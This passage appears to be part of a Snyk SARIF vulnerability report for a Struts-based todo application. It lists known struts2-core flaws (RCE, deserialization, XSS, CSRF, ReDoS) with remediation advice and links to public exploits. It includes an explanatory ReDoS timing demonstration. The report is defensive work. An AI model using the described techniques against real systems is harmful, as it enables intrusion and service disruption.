higher.\n# References\n- [Atlassian Patch](https://confluence.atlassian.com/jirakb/list-of-security-vulnerabilities-addressed-in-atlassian-log4j1-1141965553.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/6851b5083ef9610bae320bf07e1f24d2aa08851b)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-2819)\n- [Reload4j Fix Commit](https://github.com/qos-ch/reload4j/commit/90bc7826c206c256ee9ec6b51318cc1865cc19e9)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-297", + "maven" + ], + "cvssv3_baseScore": 3.7, + "security-severity": "3.7" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-2635340", + "shortDescription": { + "text": "High severity - Remote Code Execution (RCE) vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2021-31805) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). The fix issued for [CVE-2020-17530](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-1049003) was incomplete. Some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the `%{...} syntax`. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.30 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/b2bfdc5c88a13e82d647e7ae836089a12ce001fe)\n- [GitHub Security Lab - Double Evaluation in Struts](https://securitylab.github.com/research/apache-struts-double-evaluation/)\n- [Struts Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-062)\n- [Write Up & PoC](https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-31805.yaml)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30060", + "shortDescription": { + "text": "High severity - Manipulation of Struts' internals vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2015-5209) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n`ValueStack` defines special `top` object which represents root of execution context. It can be used to manipulate Struts' internals or can be used to affect container's settings.\n\n# References\n- [http://struts.apache.org/docs/s2-026.html](http://struts.apache.org/docs/s2-026.html)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-284", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30770", + "shortDescription": { + "text": "High severity - Command Injection vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2016-3081) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Command Injection. When Dynamic Method Invocation was enabled, a remote attackers could execute arbitrary code via the prefix method, related to chained expressions.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n# References\n- [Exploit DB](https://exploit-db.com/exploits/39756)\n- [GitHub Commit](https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081)\n- [Exploit DB](https://www.exploit-db.com/exploits/39756)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-77", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30773", + "shortDescription": { + "text": "Medium severity - Cross-site Scripting (XSS) vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2016-4003) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\nCross-site Scripting (XSS) vulnerability in the URLDecoder function in JRE before 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single byte page encoding, allows remote attackers to inject arbitrary web script or HTML via multi-byte characters in a url-encoded parameter.\n\n# Details\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\r\n\r\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\r\n\r\nֿInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\r\n\r\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\r\n \r\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \r\n\r\n## Types of attacks\r\nThere are a few methods by which XSS can be manipulated:\r\n\r\n|Type|Origin|Description|\r\n|--|--|--|\r\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\r\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \r\n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\r\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\r\n\r\n## Affected environments\r\nThe following environments are susceptible to an XSS attack:\r\n\r\n* Web servers\r\n* Application servers\r\n* Web application environments\r\n\r\n## How to prevent\r\nThis section describes the top best practices designed to specifically protect your code: \r\n\r\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \r\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \r\n* Give users the option to disable client-side scripts.\r\n* Redirect invalid requests.\r\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\r\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\r\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n\n# References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4003)" + }, + "properties": { + "tags": [ + "security", + "CWE-79", + "maven" + ], + "cvssv3_baseScore": 6.1, + "security-severity": "6.1" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30774", + "shortDescription": { + "text": "High severity - Cross-site Request Forgery (CSRF) vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2016-4430) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Cross-site Request Forgery (CSRF). It mishandles token validation, which allows remote attackers to conduct CSRF attacks via unspecified vectors.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n# References\n- [Apache Struts Security Bulletin](https://struts.apache.org/docs/s2-038.html)\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4430)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-352", + "maven" + ], + "cvssv3_baseScore": 8.8, + "security-severity": "8.8" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30775", + "shortDescription": { + "text": "High severity - Access Restriction Bypass vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2016-4431) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It allows remote attackers to bypass intended access restrictions and conduct redirection attacks by leveraging a default method.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n# References\n- [Apache Struts Security Bulletin](https://struts.apache.org/docs/s2-040.html)\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4431)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30776", + "shortDescription": { + "text": "High severity - Access Restriction Bypass vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2016-4433) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31495", + "shortDescription": { + "text": "High severity - Arbitrary Command Execution vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2017-9805) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\r\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\r\n\r\nThe REST Plugin in affected versions use a `XStreamHandler` with an instance of XStream for deserialization without any type filtering. By design, there are few limits to the type of objects XStream can handle. This flexibility comes at a price. The XML generated or consumed by XStream includes all information required to build Java objects of almost any type. The provided XML data is used by XStream to unmarshal Java objects. An attacker could use this flaw to execute arbitrary code or conduct further attacks.\r\n\r\n[A working exploit](https://github.com/rapid7/metasploit-framework/commit/5ea83fee5ee8c23ad95608b7e2022db5b48340ef) is publicly available and [is actively](https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/) exploited in the wild.\r\n\r\nYou can read more about this vulnerability [on our blog](https://snyk.io/blog/equifax-breach-vulnerable-open-source-libraries/).\r\n\r\n# Details\r\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker control the state or the flow of the execution. \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n- Apache Blog\r\n\r\n\r\n# Remediation\r\nDevelopers are strongly advised to upgrade their _Apache Struts_ components to version `2.3.34`, `2.5.13` or higher.\r\n\r\nIt is possible that some REST actions stop working because of applied default restrictions on available classes. In this case please investigate the new interfaces that were introduced to allow class restrictions per action, those interfaces are:\r\n* org.apache.struts2.rest.handler.AllowedClasses\r\n* org.apache.struts2.rest.handler.AllowedClassNames\r\n* org.apache.struts2.rest.handler.XStreamPermissionProvider\r\n\r\nIf for some reason upgrading is not an option, consider the following workarounds:\r\n1. Disable handling XML pages and requests to such pages\r\n```xml\r\n\r\n```\r\n\r\n2. Override getContentType in XStreamHandler\r\n```java\r\n public class MyXStreamHandler extends XStreamHandler { \r\n public String getContentType() {\r\n return \"not-existing-content-type-@;/&%$#@\";\r\n }\r\n }\r\n```\r\n\r\n3. Register the handler by overriding the one provided by the framework in your struts.xml\r\n```xml\r\n\r\n\r\n```\r\n\r\n# References\r\n- [LGTM Advisory](https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement)\r\n- [LGTM Vulnerability Details](https://lgtm.com/blog/apache_struts_CVE-2017-9805)\r\n- [Apache Struts Statement on Equifax Security Breach](https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax)\r\n- [Apache Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-052)" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31500", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2017-9787) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) attacks.\nWhen using a Spring AOP functionality to secure Struts actions it is possible to perform a DoS attack.\n\n\n# Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.33, 2.5.12 or higher.\n\n# References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-049.html)\n- [Struts Announcements Mailing List](https://lists.apache.org/thread.html/3795c4dd46d9ec75f4a6eb9eca11c11edd3e796c6c1fd7b17b5dc50d@%3Cannouncements.struts.apache.org%3E)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31501", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2017-9804) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. This is due to an incomplete fix for [CVE-2017-7672](https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-31499). If an application allows enter an URL in a form field and built-in URLValidator is used, it is possible to prepare a special URL which will be used to overload server process when performing validation of the URL.\n\n# Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.34, 2.5.13 or higher.\n\n# References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-050.html)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31502", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2017-9793) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (ReDoS) attacks. The REST Plugin is using outdated XStream library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted XML payload.\n\n# Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.34, 2.5.13 or higher.\n\n# References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-051.html)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-32477", + "shortDescription": { + "text": "High severity - Remote Code Execution vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2018-11776) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution. When the namespace value is not set for a result defined in underlying xml configurations, and in same time, its upper action(s) configurations have no or wildcard namespace, an attacker may be able to conduct a remote code execution attack. They could also use the opportunity when using a url tag which does not have a value and action set and in same time, its upper action(s) configurations have no or wildcard namespace.\n# Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.35, 2.5.17 or higher.\n# References\n- [Exploit DB](https://exploit-db.com/exploits/45367)\n- [Exploit DB](https://www.exploit-db.com/exploits/45367)\n- [GitHub Commit](https://github.com/apache/struts/commit/b3bad5ea44f3fd9edb2cb491192c5900f46d45d3)\n- [Lgtm Blog](https://lgtm.com/blog/apache_struts_CVE-2018-11776)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1620019)\n- [Struts2 Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-057)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2018/CVE-2018-11776.yaml)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-460223", + "shortDescription": { + "text": "Medium severity - Regular Expression Denial of Service (ReDoS) vulnerability in org.apache.struts:struts2-core" + }, + "fullDescription": { + "text": "(CVE-2016-4465) org.apache.struts:struts2-core@2.3.20" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.struts:struts2-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.struts:struts2-core@2.3.20\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20\n# Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The URLValidator class allows remote attackers to cause a denial of service via a null value for a URL field.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work 